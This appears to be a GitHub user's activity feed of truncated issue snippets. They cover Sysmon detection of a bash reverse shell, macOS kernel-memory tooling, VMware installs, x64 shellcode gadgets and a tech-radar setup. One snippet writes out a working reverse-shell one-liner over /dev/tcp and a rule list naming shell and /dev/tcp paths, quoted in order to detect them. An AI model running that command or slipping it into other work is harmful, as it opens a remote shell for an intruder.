Vincent Van Mieghem
Vincent Van Mieghem
#### Description I'm trying to detect the following basic `bash` reverse shell `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`. I have the following Sysmon rules enabled: ```xml /bin/bash /bin/dash /bin/sh /dev/tcp /dev/udp...
Fixes the `/dev/kmem` bad address bug in OS X 10.10 by opening `kmem` in `READ ONLY` mode. Thanks to @msedit.
I try to run bruteforcesysent on OSX 10.10.5 in VMware fusion 8. I have enabled both bootargs `sudo nvram boot-args="kmem=1"` and ``` Kernel Flags kmem=1 ``` in `/Library/Preferences/SystemConfiguration/com.apple.Boot.plist`. When I...
I performed an install of alpha_2016-12-30_1 using VMware Fusion 8.5 on macOS 10.12.2 on an [i5-6267U](http://ark.intel.com/products/91166/Intel-Core-i5-6267U-Processor-4M-Cache-up-to-3_30-GHz). With Intel VT-x enabled on first boot I experience the following:  If I...
I'm trying to get this to work for x64 shellcode. The gadget `pop r64; ret` has the same opcodes as `pop r32; ret` (afaik, could be mistaken). However, if I...
I'm trying to get the tech-radar running locally without the Firebase functions (not planning to use them). I've loaded up a Contentful instance with the example `contentful-export-2022-04-18.json` and populated the...